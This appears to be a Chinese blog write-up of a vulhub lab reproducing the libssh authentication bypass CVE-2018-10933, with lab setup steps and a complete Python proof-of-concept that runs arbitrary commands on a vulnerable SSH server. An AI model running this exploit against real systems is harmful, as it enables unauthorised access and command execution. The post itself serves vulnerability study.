vulhub漏洞复现36_Libssh

最新推荐文章于 2023-09-06 10:43:07 发布
最新推荐文章于 2023-09-06 10:43:07 发布
阅读量642 收藏 1
点赞数
文章标签: 安全 ssh 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122824656
版权

CVE-2018-10933_ libssh 服务端权限认证绕过漏洞

漏洞详情

libssh是一个提供ssh相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送`MSG_USERAUTH_SUCCESS`消息,绕过认证过程,未授权访问目标SSH服务器。

漏洞环境

靶场:192.168.4.10_ubuntu

#docker-compose up -d

环境启动后,我们可以连接`your-ip:2222`端口(账号密码:`myuser:mypassword`),这是一个合法的ssh流程:

#ssh myuser@192.168.4.10 -p 2222

漏洞复现

参考 https://www.seebug.org/vuldb/ssvid-97614 中给出的POC,我们编写一个简单的漏洞复现脚本:

```python

#!/usr/bin/env python3

import sys

import paramiko

import socket

import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)

bufsize = 2048

def execute(hostname, port, command):

    sock = socket.socket()

    try:

        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()

        transport = paramiko.transport.Transport(sock)

        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)

        transport._send_message(message)

        client = transport.open_session(timeout=10)

        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)

        stdout = client.makefile("rb", bufsize)

        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()

        error = stderr.read()

        stdout.close()

        stderr.close()

        return (output+error).decode()

    except paramiko.SSHException as e:

        logging.exception(e)

        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")

    except socket.error:

        logging.debug("Unable to connect.")

    return None

if __name__ == '__main__':

    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

```

使用python3执行,即可在目标服务器上执行任意命令:

 

Revenge_scan
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用Vulnhub漏洞 - libssh 服务端权限认证绕过漏洞(CVE-2018-10933)
JiangBuLiu的博客
07-12 1859
libssh 服务端权限认证绕过漏洞(CVE-2018-10933)Vulnhub官方教程漏洞原理过程启动环境PoC (pocsuite 插件)执行任意命令 Vulnhub官方教程 https://github.com/vulhub/vulhub/blob/master/libssh/CVE-2018-10933/README.zh-cn.md 漏洞原理 libssh是一个提供ssh相...
libssh 服务端权限认证绕过 CVE-2018-10933 漏洞
Senimo
05-03 2012
CVE-2018-10933 libssh 服务端权限认证绕过漏洞一、漏洞描述二、漏洞影响三、漏洞1、环境搭建2、漏洞四、漏洞POC五、参考链接 一、漏洞描述 libssh 是一个提供 SSH 相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证过程,未授权访问目标 SSH 服务器。 二、漏洞影响 libssh 0.6 及更高版本具有身份验证绕过漏洞。 libssh 版本 0.8.4 和 libssh
libssh 服务端权限认证绕过漏洞(CVE-2018-10933)
weixin_45366453的博客
07-05 664
libssh是一个提供ssh相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送消息,绕过认证过程,未授权访问目标SSH服务器。 Vulhub - Docker-Compose file for vulnerability environmentlibssh authentication bypass in server code (CVE-2018-10993) - 知道创宇 Seebug 漏洞平台...
libssh2被发整数溢出和越界读取漏洞(CVE-2019-13115)
systemino的博客
07-14 1252
libssh2是一个C函数库,用来实SSH2协议。SSH2是一套安全通讯协议框架(早期的SSH1由于存在安全漏洞),基于SSH2协议的产品主要有openssh,putty,SSH Secure Shell Client等,这些都是开源的,但是这些代码非常难懂而且杂,一个个函数深层次的调用很快就让人在C语言代码的海洋中迷失了方向,妄图通过从这些开源软件中抽取程序代码段来“组装”自己的应用程序是非...
新的LibSSH漏洞允许黑客在无需密码的情况下接管你的服务器
mozhe_的博客
10-19 536
LibSSH官方在本周二(10月16日)发布的安全公告中披露了一个已存在四年之久的高风险漏洞,它允许攻击者绕过身份验证,在不需要密码的情况下获取对受该漏洞影响服务器的完全控制权限。 LibSSH是一个C 函数库,用于实SSH2协议。这个新的安全漏洞被追踪为CVE-2018-10933,是一个在2014年初发布的Libssh 0.6版本中引入的SSH2登陆身份验证绕过漏洞。 根据周二发布的安全...
ssh.zip_libssh_libssh VS2010_libssh.lib_ssh_visual c
09-14
总结来说,"ssh.zip_libssh_libssh VS2010_libssh.lib_ssh_visual c"这个主题涉及了SSH协议、libssh库以及如何在Visual Studio 2010中编译和使用libssh库。通过理解这些知识点,开发者可以构建自己的SSH客户端或...
ssh.rar_libssh_ssh c#
09-24
标题 "ssh.rar_libssh_ssh c#" 暗示了这个压缩包内容与SSH(Secure Shell)有关,且可能包含一个名为 "libssh" 的库,用于C#编程环境。描述 "libssh.lib vs2010 compile (libssh)" 提到的是在Visual Studio 2010环境...
Curl7.77_openssl_zlib_libssh_x86_src.zip
06-04
《Curl7.77与OpenSSL、Zlib和LibSSH在x86平台上的集成构建详解》 Curl7.77是一个流行的开源库,主要用于处理URL传输,支持多种网络协议,如HTTP、FTP、SMTP等。这次的版本不仅包含了curl的核心功能,还特别强调了对...
SSH_Test.rar_C ssh_C#ssh_C++ ssh_C++ SSH_libssh2库
09-21
SSH_Test.rar_C ssh_C#ssh_C++ ssh_C++ SSH_libssh2库是一个针对C、C#和C++编程语言的SSH实示例,特别提到了libssh2库的使用。在Visual Studio 2010环境下,这个压缩包提供了通过SSH进行文件上传的功能。接下来,...
Curl7.77_openssl_zlib_libssh_x64_src.zip
06-04
《Curl7.77与OpenSSL、Zlib和LibSSH在Windows x64平台上的构建与应用》 Curl7.77是一款强大的命令行工具,用于在各种协议下传输数据,尤其在网络请求和文件下载方面表出色。这个版本特别强调了对openssl、zlib和...
libssh 认证绕过漏洞(cve-2018-10933)分析
whatday的专栏
08-25 2028
最近出了一个libSSH认证绕过漏洞,刚开始时候看的感觉这洞可能挺厉害的,然后很快github上面就有PoC了,msf上很快也添加了exp,但是在使用的过程中发无法getshell,对此,我进行了深入的分析研究。 前言 360发了一篇分析文章,有getshell的图: Python版本的PoC到Github上搜一下就有了: https://github.com/search?utf8=%E2%9C%93&q=CVE-2018-10933&type= 环境 libSSH-0.
vulhub】openssh CVE-2018-15473漏洞
最新发布
qq_58873970的博客
09-06 623
ssh工作机制:服务器启动的时候自己产生一个密钥(768bit公钥),本地的ssh客户端发送连接请求到ssh服务器,服务器检查连接点客户端发送的数据和IP地址,确认合法后发送密钥(768bits)给客户端,此时客户端将本地私钥(256bit)和服务器的公钥(768bit)结合成密钥对key(1024bit),发回给服务器端,建立连接通过key-pair数据传输。
利用Vulnhub漏洞 - OpenSSH 用户名枚举漏洞(CVE-2018-15473)
JiangBuLiu的博客
07-09 7828
OpenSSH 用户名枚举漏洞(CVE-2018-15473)Vulnhub官方教程漏洞原理过程启动环境漏洞CVE-2018-15473-Exploit Vulnhub官方教程 https://vulhub.org/#/environments/openssh/CVE-2018-15473/ 漏洞原理 OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用...
渗透测试环境搭建--Vulhub
a1b2c3是弱口令
12-08 5360
Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞变得更加简单,让安全研究者更加专注于漏洞原理本身。 Docker安装(Ubuntu 16.04) # Install pip curl -s https://bootstrap.pypa.io/get-pip.py | python3 # Insta...
Kali 2.0----使用Docker 搭建漏洞靶场:Vulhub
热门推荐
北风
12-14 1万+
注:转载请注明出自https://blog.csdn.net/qq_36711453/article/details/84999632 一、Docker简述 Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux机器上,也可以实虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口。通过对应用组件的封装、分发、部署、...
对 libssh2 整数溢出漏洞 (CVE-2019-17498)的分析
systemino的博客
11-07 867
0x01 漏洞挖掘 在2019年3月18日,Canonical Ltd.的Chris Coulson披露了libssh2中的九个漏洞(CVE-2019-3855至CVE-2019-3863)。这些漏洞已在libssh2 v1.8.1中修。当时,我的同事Pavel Avgustinov注意到,修漏洞的报告在LGTM上引入了多个新告警。这些告警是由于像下面的代码: if((p_len=...
请务必注意 Redis 安全配置,否则将导致轻松被入侵
多看多听多总结
12-16 4322
一、前言 前段时间,在做内网影响程度评估的时候写了扫描利用小脚本, 扫描后统计发,内网中60%开放了redis6379端口的主机处于可以被利用的危险状态,因为都是一些默认配置造成的 考虑到本社区大部分开发者都会使用redis,特此分享下以便大家可以对自己公司的内网进行一个排查。 二、漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Red
LibSSH 使用
foxskyt的专栏
06-13 4616
libssh2_sftp_read
06-03
`libssh2_sftp_read`是libssh2库中用于从SFTP文件中读取数据的函数。它的语法如下: ```c ssize_t libssh2_sftp_read(LIBSSH2_SFTP_HANDLE *handle, char *buffer, size_t buffer_maxlen); ``` 其中,`handle`是一个已经打开的SFTP文件句柄,`buffer`是用于存储读取数据的缓冲区,`buffer_maxlen`是缓冲区的最大长度。函数返回值为读取的数据长度,如果返回值为0,表示已经到达文件末尾;如果返回值为负数,则表示出了错误。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值